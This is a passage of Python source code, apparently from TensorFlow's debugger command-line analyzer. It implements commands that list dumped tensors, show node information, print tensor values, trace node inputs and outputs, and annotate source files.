as a RichTextLines object.\n\n Raises:\n ValueError: If `--filter_exclude_node_names` is used without `-f` or\n `--tensor_filter` being used.\n \"\"\"\n\n # TODO(cais): Add annotations of substrings for dumped tensor names, to\n # facilitate on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"list_tensors\"].parse_args(args)\n\n output = []\n\n filter_strs = []\n if parsed.op_type_filter:\n op_type_regex = re.compile(parsed.op_type_filter)\n filter_strs.append(\"Op type regex filter: \\\"%s\\\"\" % parsed.op_type_filter)\n else:\n op_type_regex = None\n\n if parsed.node_name_filter:\n node_name_regex = re.compile(parsed.node_name_filter)\n filter_strs.append(\"Node name regex filter: \\\"%s\\\"\" %\n parsed.node_name_filter)\n else:\n node_name_regex = None\n\n output = debugger_cli_common.RichTextLines(filter_strs)\n output.append(\"\")\n\n if parsed.tensor_filter:\n try:\n filter_callable = self.get_tensor_filter(parsed.tensor_filter)\n except ValueError:\n output = cli_shared.error(\"There is no tensor filter named \\\"%s\\\".\" %\n parsed.tensor_filter)\n _add_main_menu(output, node_name=None, enable_list_tensors=False)\n return output\n\n data_to_show = self._debug_dump.find(\n filter_callable,\n exclude_node_names=parsed.filter_exclude_node_names)\n else:\n if parsed.filter_exclude_node_names:\n raise ValueError(\n \"The flag --filter_exclude_node_names is valid only when \"\n \"the flag -f or --tensor_filter is used.\")\n\n data_to_show = self._debug_dump.dumped_tensor_data\n\n # TODO(cais): Implement filter by lambda on tensor value.\n\n max_timestamp_width, max_dump_size_width, max_op_type_width = (\n self._measure_tensor_list_column_widths(data_to_show))\n\n # Sort the data.\n data_to_show = self._sort_dump_data_by(\n data_to_show, parsed.sort_by, 
parsed.reverse)\n\n    output.extend(\n        self._tensor_list_column_heads(parsed, max_timestamp_width,\n                                       max_dump_size_width, max_op_type_width))\n\n    dump_count = 0\n    for dump in data_to_show:\n      if node_name_regex and not node_name_regex.match(dump.node_name):\n        continue\n\n      if op_type_regex:\n        op_type = self._debug_dump.node_op_type(dump.node_name)\n        if not op_type_regex.match(op_type):\n          continue\n\n      rel_time = (dump.timestamp - self._debug_dump.t0) / 1000.0\n      dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n      dumped_tensor_name = \"%s:%d\" % (dump.node_name, dump.output_slot)\n      op_type = self._debug_dump.node_op_type(dump.node_name)\n\n      line = \"[%.3f]\" % rel_time\n      line += \" \" * (max_timestamp_width - len(line))\n      line += dump_size_str\n      line += \" \" * (max_timestamp_width + max_dump_size_width - len(line))\n      line += op_type\n      line += \" \" * (max_timestamp_width + max_dump_size_width +\n                     max_op_type_width - len(line))\n      line += dumped_tensor_name\n\n      output.append(\n          line,\n          font_attr_segs=[(\n              len(line) - len(dumped_tensor_name), len(line),\n              debugger_cli_common.MenuItem(\"\", \"pt %s\" % dumped_tensor_name))])\n      dump_count += 1\n\n    if parsed.tensor_filter:\n      output.prepend([\n          \"%d dumped tensor(s) passing filter \\\"%s\\\":\" %\n          (dump_count, parsed.tensor_filter)\n      ])\n    else:\n      output.prepend([\"%d dumped tensor(s):\" % dump_count])\n\n    _add_main_menu(output, node_name=None, enable_list_tensors=False)\n    return output\n\n  def _measure_tensor_list_column_widths(self, data):\n    \"\"\"Determine the maximum widths of the timestamp, dump-size and op-type\n    columns.\n\n    This method assumes that data is sorted in the default order, i.e.,\n    by ascending timestamps.\n\n    Args:\n      data: (list of DebugTensorDatum) the data based on which the maximum\n        column widths will be determined.\n\n    Returns:\n      (int) maximum width of the timestamp column. 0 if data is empty.\n      (int) maximum width of the dump size column. 0 if data is empty.\n      (int) maximum width of the op type column. 
0 if data is empty.\n \"\"\"\n\n max_timestamp_width = 0\n if data:\n max_rel_time_ms = (data[-1].timestamp - self._debug_dump.t0) / 1000.0\n max_timestamp_width = len(\"[%.3f] \" % max_rel_time_ms) + 1\n max_timestamp_width = max(max_timestamp_width,\n len(self._TIMESTAMP_COLUMN_HEAD) + 1)\n\n max_dump_size_width = 0\n for dump in data:\n dump_size_str = cli_shared.bytes_to_readable_str(dump.dump_size_bytes)\n if len(dump_size_str) + 1 > max_dump_size_width:\n max_dump_size_width = len(dump_size_str) + 1\n max_dump_size_width = max(max_dump_size_width,\n len(self._DUMP_SIZE_COLUMN_HEAD) + 1)\n\n max_op_type_width = 0\n for dump in data:\n op_type = self._debug_dump.node_op_type(dump.node_name)\n if len(op_type) + 1 > max_op_type_width:\n max_op_type_width = len(op_type) + 1\n max_op_type_width = max(max_op_type_width,\n len(self._OP_TYPE_COLUMN_HEAD) + 1)\n\n return max_timestamp_width, max_dump_size_width, max_op_type_width\n\n def _sort_dump_data_by(self, data, sort_by, reverse):\n \"\"\"Sort a list of DebugTensorDatum in specified order.\n\n Args:\n data: (list of DebugTensorDatum) the data to be sorted.\n sort_by: The field to sort data by.\n reverse: (bool) Whether to use reversed (descending) order.\n\n Returns:\n (list of DebugTensorDatum) in sorted order.\n\n Raises:\n ValueError: given an invalid value of sort_by.\n \"\"\"\n\n if sort_by == SORT_TENSORS_BY_TIMESTAMP:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: x.timestamp)\n elif sort_by == SORT_TENSORS_BY_DUMP_SIZE:\n return sorted(data, reverse=reverse, key=lambda x: x.dump_size_bytes)\n elif sort_by == SORT_TENSORS_BY_OP_TYPE:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: self._debug_dump.node_op_type(x.node_name))\n elif sort_by == SORT_TENSORS_BY_TENSOR_NAME:\n return sorted(\n data,\n reverse=reverse,\n key=lambda x: \"%s:%d\" % (x.node_name, x.output_slot))\n else:\n raise ValueError(\"Unsupported key to sort tensors by: %s\" % sort_by)\n\n def _tensor_list_column_heads(self, parsed, max_timestamp_width,\n max_dump_size_width, max_op_type_width):\n \"\"\"Generate a line containing the column heads of the tensor list.\n\n Args:\n parsed: Parsed arguments (by argparse) of the list_tensors command.\n max_timestamp_width: (int) maximum width of the timestamp column.\n max_dump_size_width: (int) maximum width of the dump size column.\n max_op_type_width: (int) maximum width of the op type column.\n\n Returns:\n A RichTextLines object.\n \"\"\"\n\n base_command = \"list_tensors\"\n if parsed.tensor_filter:\n base_command += \" -f %s\" % parsed.tensor_filter\n if parsed.op_type_filter:\n base_command += \" -t %s\" % parsed.op_type_filter\n if parsed.node_name_filter:\n base_command += \" -n %s\" % parsed.node_name_filter\n\n attr_segs = {0: []}\n row = self._TIMESTAMP_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TIMESTAMP)\n if parsed.sort_by == SORT_TENSORS_BY_TIMESTAMP and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append(\n (0, len(row), [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_timestamp_width - len(row))\n\n prev_len = len(row)\n row += self._DUMP_SIZE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_DUMP_SIZE)\n if parsed.sort_by == SORT_TENSORS_BY_DUMP_SIZE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (max_dump_size_width + max_timestamp_width - len(row))\n\n prev_len = len(row)\n 
row += self._OP_TYPE_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_OP_TYPE)\n if parsed.sort_by == SORT_TENSORS_BY_OP_TYPE and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(None, command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n prev_len = len(row)\n row += self._TENSOR_NAME_COLUMN_HEAD\n command = \"%s -s %s\" % (base_command, SORT_TENSORS_BY_TENSOR_NAME)\n if parsed.sort_by == SORT_TENSORS_BY_TENSOR_NAME and not parsed.reverse:\n command += \" -r\"\n attr_segs[0].append((prev_len, len(row),\n [debugger_cli_common.MenuItem(\"\", command), \"bold\"]))\n row += \" \" * (\n max_op_type_width + max_dump_size_width + max_timestamp_width - len(row)\n )\n\n return debugger_cli_common.RichTextLines([row], font_attr_segs=attr_segs)\n\n def node_info(self, args, screen_info=None):\n \"\"\"Command handler for node_info.\n\n Query information about a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # TODO(cais): Add annotation of substrings for node names, to facilitate\n # on-screen highlighting/selection of node names.\n _ = screen_info\n\n parsed = self._arg_parsers[\"node_info\"].parse_args(args)\n\n # Get a node name, regardless of whether the input is a node name (without\n # output slot attached) or a tensor name (with output slot attached).\n node_name, unused_slot = debug_graphs.parse_node_or_tensor_name(\n parsed.node_name)\n\n if not self._debug_dump.node_exists(node_name):\n output = cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_node_info=False,\n enable_list_inputs=False,\n enable_list_outputs=False)\n return output\n\n # TODO(cais): Provide UI glossary feature to explain to users what the\n # term \"partition graph\" means and how it is related to TF graph objects\n # in Python. The information can be along the line of:\n # \"A tensorflow graph defined in Python is stripped of unused ops\n # according to the feeds and fetches and divided into a number of\n # partition graphs that may be distributed among multiple devices and\n # hosts. 
The partition graphs are what's actually executed by the C++\n # runtime during a run() call.\"\n\n lines = [\"Node %s\" % node_name]\n font_attr_segs = {\n 0: [(len(lines[-1]) - len(node_name), len(lines[-1]), \"bold\")]\n }\n lines.append(\"\")\n lines.append(\" Op: %s\" % self._debug_dump.node_op_type(node_name))\n lines.append(\" Device: %s\" % self._debug_dump.node_device(node_name))\n output = debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n # List node inputs (non-control and control).\n inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name))\n ctrl_inputs = self._exclude_denylisted_ops(\n self._debug_dump.node_inputs(node_name, is_control=True))\n output.extend(self._format_neighbors(\"input\", inputs, ctrl_inputs))\n\n # List node output recipients (non-control and control).\n recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name))\n ctrl_recs = self._exclude_denylisted_ops(\n self._debug_dump.node_recipients(node_name, is_control=True))\n output.extend(self._format_neighbors(\"recipient\", recs, ctrl_recs))\n\n # Optional: List attributes of the node.\n if parsed.attributes:\n output.extend(self._list_node_attributes(node_name))\n\n # Optional: List dumps available from the node.\n if parsed.dumps:\n output.extend(self._list_node_dumps(node_name))\n\n if parsed.traceback:\n output.extend(self._render_node_traceback(node_name))\n\n _add_main_menu(output, node_name=node_name, enable_node_info=False)\n return output\n\n def _exclude_denylisted_ops(self, node_names):\n \"\"\"Exclude all nodes whose op types are in _GRAPH_STRUCT_OP_TYPE_DENYLIST.\n\n Args:\n node_names: An iterable of node or graph element names.\n\n Returns:\n A list of node names that are not denylisted.\n \"\"\"\n return [\n node_name for node_name in node_names\n if self._debug_dump.node_op_type(debug_graphs.get_node_name(node_name))\n not in self._GRAPH_STRUCT_OP_TYPE_DENYLIST\n ]\n\n def _render_node_traceback(self, node_name):\n \"\"\"Render traceback of a node's creation in Python, if available.\n\n Args:\n node_name: (str) name of the node.\n\n Returns:\n A RichTextLines object containing the stack trace of the node's\n construction.\n \"\"\"\n\n lines = [RL(\"\"), RL(\"\"), RL(\"Traceback of node construction:\", \"bold\")]\n\n try:\n node_stack = self._debug_dump.node_traceback(node_name)\n for depth, (file_path, line, function_name, text) in enumerate(\n node_stack):\n lines.append(\"%d: %s\" % (depth, file_path))\n\n attribute = debugger_cli_common.MenuItem(\n \"\", \"ps %s -b %d\" % (file_path, line)) if text else None\n line_number_line = RL(\" \")\n line_number_line += RL(\"Line: %d\" % line, attribute)\n lines.append(line_number_line)\n\n lines.append(\" Function: %s\" % function_name)\n lines.append(\" Text: \" + ((\"\\\"%s\\\"\" % text) if text else \"None\"))\n lines.append(\"\")\n except KeyError:\n lines.append(\"(Node unavailable in the loaded Python graph)\")\n except LookupError:\n lines.append(\"(Unavailable because no Python graph has been loaded)\")\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_inputs(self, args, screen_info=None):\n \"\"\"Command handler for inputs.\n\n Show inputs to a given node.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n # Screen info not currently 
used by this handler. Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_inputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=False)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_inputs=False)\n\n return output\n\n def print_tensor(self, args, screen_info=None):\n \"\"\"Command handler for print_tensor.\n\n Print value of a given dumped tensor.\n\n Args:\n args: Command-line arguments, excluding the command prefix, as a list of\n str.\n screen_info: Optional dict input containing screen information such as\n cols.\n\n Returns:\n Output text lines as a RichTextLines object.\n \"\"\"\n\n parsed = self._arg_parsers[\"print_tensor\"].parse_args(args)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n\n # Determine if any range-highlighting is required.\n highlight_options = cli_shared.parse_ranges_highlight(parsed.ranges)\n\n tensor_name, tensor_slicing = (\n command_parser.parse_tensor_name_with_slicing(parsed.tensor_name))\n\n node_name, output_slot = debug_graphs.parse_node_or_tensor_name(tensor_name)\n if (self._debug_dump.loaded_partition_graphs() and\n not self._debug_dump.node_exists(node_name)):\n output = cli_shared.error(\n \"Node \\\"%s\\\" does not exist in partition graphs\" % node_name)\n _add_main_menu(\n output,\n node_name=None,\n enable_list_tensors=True,\n enable_print_tensor=False)\n return output\n\n watch_keys = self._debug_dump.debug_watch_keys(node_name)\n if output_slot is None:\n output_slots = set()\n for watch_key in watch_keys:\n output_slots.add(int(watch_key.split(\":\")[1]))\n\n if len(output_slots) == 1:\n # There is only one dumped tensor from this node, so there is no\n # ambiguity. Proceed to show the only dumped tensor.\n output_slot = list(output_slots)[0]\n else:\n # There are more than one dumped tensors from this node. 
Indicate as\n        # such.\n        # TODO(cais): Provide an output screen with command links for\n        #   convenience.\n        lines = [\n            \"Node \\\"%s\\\" generated debug dumps from %s output slots:\" %\n            (node_name, len(output_slots)),\n            \"Please specify the output slot: %s:x.\" % node_name\n        ]\n        output = debugger_cli_common.RichTextLines(lines)\n        _add_main_menu(\n            output,\n            node_name=node_name,\n            enable_list_tensors=True,\n            enable_print_tensor=False)\n        return output\n\n    # Find debug dump data that match the tensor name (node name + output\n    # slot).\n    matching_data = []\n    for watch_key in watch_keys:\n      debug_tensor_data = self._debug_dump.watch_key_to_data(watch_key)\n      for datum in debug_tensor_data:\n        if datum.output_slot == output_slot:\n          matching_data.append(datum)\n\n    if not matching_data:\n      # No dump for this tensor.\n      output = cli_shared.error(\"Tensor \\\"%s\\\" did not generate any dumps.\" %\n                                parsed.tensor_name)\n    elif len(matching_data) == 1:\n      # There is only one dump for this tensor.\n      if parsed.number <= 0:\n        output = cli_shared.format_tensor(\n            matching_data[0].get_tensor(),\n            matching_data[0].watch_key,\n            np_printoptions,\n            print_all=parsed.print_all,\n            tensor_slicing=tensor_slicing,\n            highlight_options=highlight_options,\n            include_numeric_summary=parsed.numeric_summary,\n            write_path=parsed.write_path)\n      else:\n        output = cli_shared.error(\n            \"Invalid number (%d) for tensor %s, which generated one dump.\" %\n            (parsed.number, parsed.tensor_name))\n\n      _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n    else:\n      # There is more than one dump for this tensor.\n      if parsed.number < 0:\n        lines = [\n            \"Tensor \\\"%s\\\" generated %d dumps:\" % (parsed.tensor_name,\n                                                   len(matching_data))\n        ]\n        font_attr_segs = {}\n\n        for i, datum in enumerate(matching_data):\n          rel_time = (datum.timestamp - self._debug_dump.t0) / 1000.0\n          lines.append(\"#%d [%.3f ms] %s\" % (i, rel_time, datum.watch_key))\n          command = \"print_tensor %s -n %d\" % (parsed.tensor_name, i)\n          font_attr_segs[len(lines) - 1] = [(\n              len(lines[-1]) - len(datum.watch_key), len(lines[-1]),\n              debugger_cli_common.MenuItem(None, command))]\n\n        lines.append(\"\")\n        lines.append(\n            \"You can use the -n (--number) flag to specify which dump to \"\n            \"print.\")\n        lines.append(\"For example:\")\n        lines.append(\"  print_tensor %s -n 0\" % parsed.tensor_name)\n\n        output = debugger_cli_common.RichTextLines(\n            lines, font_attr_segs=font_attr_segs)\n      elif parsed.number >= len(matching_data):\n        output = cli_shared.error(\n            \"Specified number (%d) exceeds the number of available dumps \"\n            \"(%d) for tensor %s\" %\n            (parsed.number, len(matching_data), parsed.tensor_name))\n      else:\n        output = cli_shared.format_tensor(\n            matching_data[parsed.number].get_tensor(),\n            matching_data[parsed.number].watch_key + \" (dump #%d)\" %\n            parsed.number,\n            np_printoptions,\n            print_all=parsed.print_all,\n            tensor_slicing=tensor_slicing,\n            highlight_options=highlight_options,\n            write_path=parsed.write_path)\n      _add_main_menu(output, node_name=node_name, enable_print_tensor=False)\n\n    return output\n\n  def list_outputs(self, args, screen_info=None):\n    \"\"\"Command handler for list_outputs.\n\n    Show the output recipients of a given node.\n\n    Args:\n      args: Command-line arguments, excluding the command prefix, as a list of\n        str.\n      screen_info: Optional dict input containing screen information such as\n        cols.\n\n    Returns:\n      Output text lines as a RichTextLines object.\n    \"\"\"\n\n    # Screen info not currently used by this handler. 
Include this line to\n # mute pylint.\n _ = screen_info\n # TODO(cais): Use screen info to format the output lines more prettily,\n # e.g., hanging indent of long node names.\n\n parsed = self._arg_parsers[\"list_outputs\"].parse_args(args)\n\n output = self._list_inputs_or_outputs(\n parsed.recursive,\n parsed.node_name,\n parsed.depth,\n parsed.control,\n parsed.op_type,\n do_outputs=True)\n\n node_name = debug_graphs.get_node_name(parsed.node_name)\n _add_main_menu(output, node_name=node_name, enable_list_outputs=False)\n\n return output\n\n def evaluate_expression(self, args, screen_info=None):\n parsed = self._arg_parsers[\"eval\"].parse_args(args)\n\n eval_res = self._evaluator.evaluate(parsed.expression)\n\n np_printoptions = cli_shared.numpy_printoptions_from_screen_info(\n screen_info)\n return cli_shared.format_tensor(\n eval_res,\n \"from eval of expression '%s'\" % parsed.expression,\n np_printoptions,\n print_all=parsed.print_all,\n include_numeric_summary=True,\n write_path=parsed.write_path)\n\n def _reconstruct_print_source_command(self,\n parsed,\n line_begin,\n max_elements_per_line_increase=0):\n return \"ps %s %s -b %d -m %d\" % (\n parsed.source_file_path, \"-t\" if parsed.tensors else \"\", line_begin,\n parsed.max_elements_per_line + max_elements_per_line_increase)\n\n def print_source(self, args, screen_info=None):\n \"\"\"Print the content of a source file.\"\"\"\n del screen_info # Unused.\n\n parsed = self._arg_parsers[\"print_source\"].parse_args(args)\n\n source_annotation = source_utils.annotate_source(\n self._debug_dump,\n parsed.source_file_path,\n do_dumped_tensors=parsed.tensors)\n\n source_lines, line_num_width = source_utils.load_source(\n parsed.source_file_path)\n\n labeled_source_lines = []\n actual_initial_scroll_target = 0\n for i, line in enumerate(source_lines):\n annotated_line = RL(\"L%d\" % (i + 1), cli_shared.COLOR_YELLOW)\n annotated_line += \" \" * (line_num_width - len(annotated_line))\n annotated_line += line\n labeled_source_lines.append(annotated_line)\n\n if i + 1 == parsed.line_begin:\n actual_initial_scroll_target = len(labeled_source_lines) - 1\n\n if i + 1 in source_annotation:\n sorted_elements = sorted(source_annotation[i + 1])\n for k, element in enumerate(sorted_elements):\n if k >= parsed.max_elements_per_line:\n omitted_info_line = RL(\" (... Omitted %d of %d %s ...) 
\" % (\n len(sorted_elements) - parsed.max_elements_per_line,\n len(sorted_elements),\n \"tensor(s)\" if parsed.tensors else \"op(s)\"))\n omitted_info_line += RL(\n \"+5\",\n debugger_cli_common.MenuItem(\n None,\n self._reconstruct_print_source_command(\n parsed, i + 1, max_elements_per_line_increase=5)))\n labeled_source_lines.append(omitted_info_line)\n break\n\n label = RL(\" \" * 4)\n if self._debug_dump.debug_watch_keys(\n debug_graphs.get_node_name(element)):\n attribute = debugger_cli_common.MenuItem(\"\", \"pt %s\" % element)\n else:\n attribute = cli_shared.COLOR_BLUE\n\n label += RL(element, attribute)\n labeled_source_lines.append(label)\n\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(\n labeled_source_lines,\n annotations={debugger_cli_common.INIT_SCROLL_POS_KEY:\n actual_initial_scroll_target})\n _add_main_menu(output, node_name=None)\n return output\n\n def _make_source_table(self, source_list, is_tf_py_library):\n \"\"\"Make a table summarizing the source files that create nodes and tensors.\n\n Args:\n source_list: List of source files and related information as a list of\n tuples (file_path, is_tf_library, num_nodes, num_tensors, num_dumps,\n first_line).\n is_tf_py_library: (`bool`) whether this table is for files that belong\n to the TensorFlow Python library.\n\n Returns:\n The table as a `debugger_cli_common.RichTextLines` object.\n \"\"\"\n path_head = \"Source file path\"\n num_nodes_head = \"#(nodes)\"\n num_tensors_head = \"#(tensors)\"\n num_dumps_head = \"#(tensor dumps)\"\n\n if is_tf_py_library:\n # Use color to mark files that are guessed to belong to TensorFlow Python\n # library.\n color = cli_shared.COLOR_GRAY\n lines = [RL(\"TensorFlow Python library file(s):\", color)]\n else:\n color = cli_shared.COLOR_WHITE\n lines = [RL(\"File(s) outside TensorFlow Python library:\", color)]\n\n if not source_list:\n lines.append(RL(\"[No files.]\"))\n lines.append(RL())\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n path_column_width = max(\n max(len(item[0]) for item in source_list), len(path_head)) + 1\n num_nodes_column_width = max(\n max(len(str(item[2])) for item in source_list),\n len(num_nodes_head)) + 1\n num_tensors_column_width = max(\n max(len(str(item[3])) for item in source_list),\n len(num_tensors_head)) + 1\n\n head = RL(path_head + \" \" * (path_column_width - len(path_head)), color)\n head += RL(num_nodes_head + \" \" * (\n num_nodes_column_width - len(num_nodes_head)), color)\n head += RL(num_tensors_head + \" \" * (\n num_tensors_column_width - len(num_tensors_head)), color)\n head += RL(num_dumps_head, color)\n\n lines.append(head)\n\n for (file_path, _, num_nodes, num_tensors, num_dumps,\n first_line_num) in source_list:\n path_attributes = [color]\n if source_utils.is_extension_uncompiled_python_source(file_path):\n path_attributes.append(\n debugger_cli_common.MenuItem(None, \"ps %s -b %d\" %\n (file_path, first_line_num)))\n\n line = RL(file_path, path_attributes)\n line += \" \" * (path_column_width - len(line))\n line += RL(\n str(num_nodes) + \" \" * (num_nodes_column_width - len(str(num_nodes))),\n color)\n line += RL(\n str(num_tensors) + \" \" *\n (num_tensors_column_width - len(str(num_tensors))), color)\n line += RL(str(num_dumps), color)\n lines.append(line)\n lines.append(RL())\n\n return debugger_cli_common.rich_text_lines_from_rich_line_list(lines)\n\n def list_source(self, args, screen_info=None):\n \"\"\"List Python source files that constructed nodes and tensors.\"\"\"\n del 
screen_info # Unused.\n\n parsed = self._arg_parsers[\"list_source\"].parse_args(args)\n source_list = source_utils.list_source_files_against_dump(\n self._debug_dump,\n path_regex_allowlist=parsed.path_filter,\n node_name_regex_allowlist=parsed.node_name_filter)\n\n top_lines = [\n RL(\"List of source files that created nodes in this run\", \"bold\")]\n if parsed.path_filter:\n top_lines.append(\n RL(\"File path regex filter: \\\"%s\\\"\" % parsed.path_filter))\n if parsed.node_name_filter:\n top_lines.append(\n RL(\"Node name regex filter: \\\"%s\\\"\" % parsed.node_name_filter))\n top_lines.append(RL())\n output = debugger_cli_common.rich_text_lines_from_rich_line_list(top_lines)\n if not source_list:\n output.append(\"[No source file information.]\")\n return output\n\n output.extend(self._make_source_table(\n [item for item in source_list if not item[1]], False))\n output.extend(self._make_source_table(\n [item for item in source_list if item[1]], True))\n _add_main_menu(output, node_name=None)\n return output\n\n def _list_inputs_or_outputs(self,\n recursive,\n node_name,\n depth,\n control,\n op_type,\n do_outputs=False):\n \"\"\"Helper function used by list_inputs and list_outputs.\n\n Format a list of lines to display the inputs or output recipients of a\n given node.\n\n Args:\n recursive: Whether the listing is to be done recursively, as a boolean.\n node_name: The name of the node in question, as a str.\n depth: Maximum recursion depth, applies only if recursive == True, as an\n int.\n control: Whether control inputs or control recipients are included, as a\n boolean.\n op_type: Whether the op types of the nodes are to be included, as a\n boolean.\n do_outputs: Whether recipients, instead of input nodes are to be\n listed, as a boolean.\n\n Returns:\n Input or recipient tree formatted as a RichTextLines object.\n \"\"\"\n\n if do_outputs:\n tracker = self._debug_dump.node_recipients\n type_str = \"Recipients of\"\n short_type_str = \"recipients\"\n else:\n tracker = self._debug_dump.node_inputs\n type_str = \"Inputs to\"\n short_type_str = \"inputs\"\n\n lines = []\n font_attr_segs = {}\n\n # Check if this is a tensor name, instead of a node name.\n node_name, _ = debug_graphs.parse_node_or_tensor_name(node_name)\n\n # Check if node exists.\n if not self._debug_dump.node_exists(node_name):\n return cli_shared.error(\n \"There is no node named \\\"%s\\\" in the partition graphs\" % node_name)\n\n if recursive:\n max_depth = depth\n else:\n max_depth = 1\n\n if control:\n include_ctrls_str = \", control %s included\" % short_type_str\n else:\n include_ctrls_str = \"\"\n\n line = \"%s node \\\"%s\\\"\" % (type_str, node_name)\n font_attr_segs[0] = [(len(line) - 1 - len(node_name), len(line) - 1, \"bold\")\n ]\n lines.append(line + \" (Depth limit = %d%s):\" % (max_depth, include_ctrls_str\n ))\n\n command_template = \"lo -c -r %s\" if do_outputs else \"li -c -r %s\"\n self._dfs_from_node(\n lines,\n font_attr_segs,\n node_name,\n tracker,\n max_depth,\n 1, [],\n control,\n op_type,\n command_template=command_template)\n\n # Include legend.\n lines.append(\"\")\n lines.append(\"Legend:\")\n lines.append(\" (d): recursion depth = d.\")\n\n if control:\n lines.append(\" (Ctrl): Control input.\")\n if op_type:\n lines.append(\" [Op]: Input node has op type Op.\")\n\n # TODO(cais): Consider appending \":0\" at the end of 1st outputs of nodes.\n\n return debugger_cli_common.RichTextLines(\n lines, font_attr_segs=font_attr_segs)\n\n def _dfs_from_node(self,\n lines,\n attr_segs,\n 
node_name,\n                     tracker,\n                     max_depth,\n                     depth,\n                     unfinished,\n                     include_control=False,\n                     show_op_type=False,\n                     command_template=None):\n    \"\"\"Perform depth-first search (DFS) traversal of a node's input tree.\n\n    It recursively tracks the inputs (or output recipients) of the node called\n    node_name, and appends these inputs (or output recipients) to a list of text\n    lines (lines) with proper indentation that reflects the recursion depth,\n    together with some formatting attributes (to attr_segs). The formatting\n    attributes can include command shortcuts, for example.\n\n    Args:\n      lines: Text lines to append to, as a list of str.\n      attr_segs: (dict) Attribute segments dictionary to append to.\n      node_name: Name of the node, as a str. This arg is updated during the\n        recursion.\n      tracker: A callable that takes one str as the node name input and\n        returns a list of str as the inputs/outputs.\n        This makes this function general enough to be used with both\n        node-input and node-output tracking.\n      max_depth: Maximum recursion depth, as an int.\n      depth: Current recursion depth. This arg is updated during the\n        recursion.\n      unfinished: A stack of unfinished recursion depths, as a list of int.\n      include_control: Whether control dependencies are to be included as\n        inputs (and marked as such).\n      show_op_type: Whether op type of the input nodes are to be displayed\n        alongside the nodes' names.\n      command_template: (str) Template for command shortcut of the node names.\n    \"\"\"\n\n    # Make a shallow copy of the list because it may be extended later.\n    all_inputs = self._exclude_denylisted_ops(\n        copy.copy(tracker(node_name, is_control=False)))\n    is_ctrl = [False] * len(all_inputs)\n    if include_control:\n      # Sort control inputs or recipients in alphabetical order of the node\n      # names.\n      ctrl_inputs = self._exclude_denylisted_ops(\n          sorted(tracker(node_name, is_control=True)))\n      all_inputs.extend(ctrl_inputs)\n      is_ctrl.extend([True] * len(ctrl_inputs))\n\n    if not all_inputs:\n      if depth == 1:\n        lines.append(\" [None]\")\n\n      return\n\n    unfinished.append(depth)\n\n    # Create depth-dependent hanging indent for the line.\n    hang = \"\"\n    for k in range(depth):\n      if k < depth - 1:\n        if k + 1 in unfinished:\n          hang += HANG_UNFINISHED\n        else:\n          hang += HANG_FINISHED\n      else:\n        hang += HANG_SUFFIX\n\n    if all_inputs and depth > max_depth:\n      lines.append(hang + ELLIPSIS)\n      unfinished.pop()\n      return\n\n    hang += DEPTH_TEMPLATE % depth\n\n    for i, inp in enumerate(all_inputs):\n      op_type = self._debug_dump.node_op_type(debug_graphs.get_node_name(inp))\n      if op_type in self._GRAPH_STRUCT_OP_TYPE_DENYLIST:\n        continue\n\n      if is_ctrl[i]:\n        ctrl_str = CTRL_LABEL\n      else:\n        ctrl_str = \"\"\n\n      op_type_str = \"\"\n      if show_op_type:\n        op_type_str = OP_TYPE_TEMPLATE % op_type\n\n      if i == len(all_inputs) - 1:\n        unfinished.pop()\n\n      line = hang + ctrl_str + op_type_str + inp\n      lines.append(line)\n      if command_template:\n        attr_segs[len(lines) - 1] = [(\n            len(line) - len(inp), len(line),\n            debugger_cli_common.MenuItem(None, command_template % inp))]\n\n      # Recursive call.\n      # The input's/output's name can be a tensor name, in the case of node\n      # with >1 output slots.\n      inp_node_name, _ = debug_graphs.parse_node_or_tensor_name(inp)\n      self._dfs_from_node(\n          lines,\n          attr_segs,\n          inp_node_name,\n          tracker,\n          max_depth,\n          depth + 1,\n          unfinished,\n          include_control=include_control,\n          show_op_type=show_op_type,\n          command_template=command_template)\n\n  def _format_neighbors(self, neighbor_type, non_ctrls, ctrls):\n    \"\"\"List neighbors (inputs or 
